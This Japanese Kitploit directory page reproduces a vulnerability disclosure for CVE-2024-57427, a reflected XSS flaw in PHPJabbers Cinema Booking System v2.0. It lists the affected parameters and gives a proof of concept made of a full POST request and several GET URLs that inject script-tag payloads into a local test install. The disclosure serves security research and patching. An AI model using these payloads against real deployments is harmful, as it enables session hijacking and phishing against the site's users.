Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-57427 — CVE-2024-57427: PHPJabbers Cinema Booking System v2.0 は、リフレクト型XSSの脆弱性があり、セッションハイジャックやフィッシング攻撃を可能にします。 | Kitploit
ツール/GitHubGitHub/ahrixia/cve-2024-57427
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubahrixia/cve-2024-57427

CVE-2024-57427

CVE-2024-57427: PHPJabbers Cinema Booking System v2.0 は、リフレクト型XSSの脆弱性があり、セッションハイジャックやフィッシング攻撃を可能にします。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-57427 - リフレクション型クロスサイトスクリプティング(XSS)

PHPJabbers Cinema Booking System v2.0 は、リフレクション型クロスサイトスクリプティング(XSS)に対して脆弱です。複数のエンドポイントがユーザー入力を適切に処理しないため、被害者のブラウザで悪意のあるスクリプトが実行される可能性があります。攻撃者は悪意のあるリンクを作成してセッションクッキーを盗んだり、フィッシング攻撃を仕掛けたりすることができます。

脆弱なパラメータ:

影響を受けるPOSTリクエスト関数

  • OPTIONS > BOOKING FORM:
    • value-enum-o_currency
    • value-enum-o_booking_status
    • value-enum-o_payment_status
    • value-enum-o_payment_disable
    • value-enum-o_allow_paypal
    • value-enum-o_allow_authorize
    • value-enum-o_allow_cash
    • value-enum-o_allow_creditcard
    • value-enum-o_allow_bank
  • OPTIONS > BOOKING:
    • value-enum-o_bf_include_title
    • value-enum-o_bf_include_name
    • value-enum-o_bf_include_email
    • value-enum-o_bf_include_phone
    • value-enum-o_bf_include_company
    • value-enum-o_bf_include_address
    • value-enum-o_bf_include_country
    • value-enum-o_bf_include_state
    • value-enum-o_bf_include_city
    • value-enum-o_bf_include_zip
    • value-enum-o_bf_include_notes
    • value-enum-o_bf_include_captcha

影響を受けるGETリクエスト関数

  • locale
  • hide
  • theme

影響:

攻撃者は被害者のブラウザで任意のJavaScriptコードを実行でき、データの窃取、セッションハイジャック、フィッシング攻撃が可能になります。この脆弱性はユーザーセッションのセキュリティと完全性、さらにはアプリケーション自体を危険にさらす可能性があります。

エクスプロイト - 概念実証(POC)

リフレクション型クロスサイトスクリプティング(XSS)

ペイロード: <script>alert(x)</script>

完全なPOSTリクエスト

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminOptions&action=pjActionUpdate HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: CinemaBooking=xxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 778

options_update=1&next_action=pjActionBookingForm&value-enum-o_bf_include_title=XXS1<script>alert(1)</script>&value-enum-o_bf_include_name=XXS2<script>alert(2)</script>&value-enum-o_bf_include_email=XXS3<script>alert(3)</script>&value-enum-o_bf_include_phone=XXS4<script>alert(4)</script>&value-enum-o_bf_include_company=XXS5<script>alert(5)</script>&value-enum-o_bf_include_address=XXS6<script>alert(6)</script>&value-enum-o_bf_include_country=XXS7<script>alert(7)</script>&value-enum-o_bf_include_state=XXS8<script>alert(8)</script>&value-enum-o_bf_include_city=XXS9<script>alert(9)</script>&value-enum-o_bf_include_zip=XXS10<script>alert(10)</script>&value-enum-o_bf_include_notes=XXS11<script>alert(11)</script>&value-enum-o_bf_include_captcha=XXS12<script>alert(12)</script>

完全なGETリクエスト

ペイロード: "><script>alert(x)</script> and "></script><script>alert(x)</script>

root@kitploit:~
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1&hide=0&theme=theme2"><script>alert(1)</script>&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1&hide=XXS1"></script><script>alert(1)</script>&theme=theme2&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1se"></script><script>alert(1)</script>&hide=0&theme=theme2&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionGetSeats&event_id=14&venue_id=2&date_time=15-12-2024 00:00&index=new_1492"><script>alert(1)</script>
ツールをダウンロード